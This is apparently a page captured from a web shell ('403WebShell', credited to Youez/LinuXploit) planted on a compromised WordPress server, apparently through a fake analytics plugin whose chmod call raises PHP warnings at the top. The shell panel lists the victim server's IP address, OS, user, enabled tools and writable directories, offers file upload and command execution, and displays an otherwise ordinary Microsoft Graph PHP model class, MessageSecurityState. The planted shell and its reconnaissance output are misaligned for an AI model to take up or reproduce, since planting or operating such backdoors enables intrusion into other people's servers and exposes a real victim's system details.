Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/MessageSecurityState.php
<?php
/**
* Copyright (c) Microsoft Corporation.  All Rights Reserved.  Licensed under the MIT License.  See License in the project root for license information.
* 
* MessageSecurityState File
* PHP version 7
*
* @category  Library
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* MessageSecurityState class
*
* @category  Model
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
class MessageSecurityState extends Entity
{
    /**
    * Gets the connectingIP
    *
    * @return string|null The connectingIP
    */
    public function getConnectingIP()
    {
        if (array_key_exists("connectingIP", $this->_propDict)) {
            return $this->_propDict["connectingIP"];
        } else {
            return null;
        }
    }

    /**
    * Sets the connectingIP
    *
    * @param string $val The value of the connectingIP
    *
    * @return MessageSecurityState
    */
    public function setConnectingIP($val)
    {
        $this->_propDict["connectingIP"] = $val;
        return $this;
    }
    /**
    * Gets the deliveryAction
    *
    * @return string|null The deliveryAction
    */
    public function getDeliveryAction()
    {
        if (array_key_exists("deliveryAction", $this->_propDict)) {
            return $this->_propDict["deliveryAction"];
        } else {
            return null;
        }
    }

    /**
    * Sets the deliveryAction
    *
    * @param string $val The value of the deliveryAction
    *
    * @return MessageSecurityState
    */
    public function setDeliveryAction($val)
    {
        $this->_propDict["deliveryAction"] = $val;
        return $this;
    }
    /**
    * Gets the deliveryLocation
    *
    * @return string|null The deliveryLocation
    */
    public function getDeliveryLocation()
    {
        if (array_key_exists("deliveryLocation", $this->_propDict)) {
            return $this->_propDict["deliveryLocation"];
        } else {
            return null;
        }
    }

    /**
    * Sets the deliveryLocation
    *
    * @param string $val The value of the deliveryLocation
    *
    * @return MessageSecurityState
    */
    public function setDeliveryLocation($val)
    {
        $this->_propDict["deliveryLocation"] = $val;
        return $this;
    }
    /**
    * Gets the directionality
    *
    * @return string|null The directionality
    */
    public function getDirectionality()
    {
        if (array_key_exists("directionality", $this->_propDict)) {
            return $this->_propDict["directionality"];
        } else {
            return null;
        }
    }

    /**
    * Sets the directionality
    *
    * @param string $val The value of the directionality
    *
    * @return MessageSecurityState
    */
    public function setDirectionality($val)
    {
        $this->_propDict["directionality"] = $val;
        return $this;
    }
    /**
    * Gets the internetMessageId
    *
    * @return string|null The internetMessageId
    */
    public function getInternetMessageId()
    {
        if (array_key_exists("internetMessageId", $this->_propDict)) {
            return $this->_propDict["internetMessageId"];
        } else {
            return null;
        }
    }

    /**
    * Sets the internetMessageId
    *
    * @param string $val The value of the internetMessageId
    *
    * @return MessageSecurityState
    */
    public function setInternetMessageId($val)
    {
        $this->_propDict["internetMessageId"] = $val;
        return $this;
    }
    /**
    * Gets the messageFingerprint
    *
    * @return string|null The messageFingerprint
    */
    public function getMessageFingerprint()
    {
        if (array_key_exists("messageFingerprint", $this->_propDict)) {
            return $this->_propDict["messageFingerprint"];
        } else {
            return null;
        }
    }

    /**
    * Sets the messageFingerprint
    *
    * @param string $val The value of the messageFingerprint
    *
    * @return MessageSecurityState
    */
    public function setMessageFingerprint($val)
    {
        $this->_propDict["messageFingerprint"] = $val;
        return $this;
    }

    /**
    * Gets the messageReceivedDateTime
    *
    * @return \DateTime|null The messageReceivedDateTime
    */
    public function getMessageReceivedDateTime()
    {
        if (array_key_exists("messageReceivedDateTime", $this->_propDict)) {
            if (is_a($this->_propDict["messageReceivedDateTime"], "\DateTime") || is_null($this->_propDict["messageReceivedDateTime"])) {
                return $this->_propDict["messageReceivedDateTime"];
            } else {
                $this->_propDict["messageReceivedDateTime"] = new \DateTime($this->_propDict["messageReceivedDateTime"]);
                return $this->_propDict["messageReceivedDateTime"];
            }
        }
        return null;
    }

    /**
    * Sets the messageReceivedDateTime
    *
    * @param \DateTime $val The value to assign to the messageReceivedDateTime
    *
    * @return MessageSecurityState The MessageSecurityState
    */
    public function setMessageReceivedDateTime($val)
    {
        $this->_propDict["messageReceivedDateTime"] = $val;
         return $this;
    }
    /**
    * Gets the messageSubject
    *
    * @return string|null The messageSubject
    */
    public function getMessageSubject()
    {
        if (array_key_exists("messageSubject", $this->_propDict)) {
            return $this->_propDict["messageSubject"];
        } else {
            return null;
        }
    }

    /**
    * Sets the messageSubject
    *
    * @param string $val The value of the messageSubject
    *
    * @return MessageSecurityState
    */
    public function setMessageSubject($val)
    {
        $this->_propDict["messageSubject"] = $val;
        return $this;
    }
    /**
    * Gets the networkMessageId
    *
    * @return string|null The networkMessageId
    */
    public function getNetworkMessageId()
    {
        if (array_key_exists("networkMessageId", $this->_propDict)) {
            return $this->_propDict["networkMessageId"];
        } else {
            return null;
        }
    }

    /**
    * Sets the networkMessageId
    *
    * @param string $val The value of the networkMessageId
    *
    * @return MessageSecurityState
    */
    public function setNetworkMessageId($val)
    {
        $this->_propDict["networkMessageId"] = $val;
        return $this;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit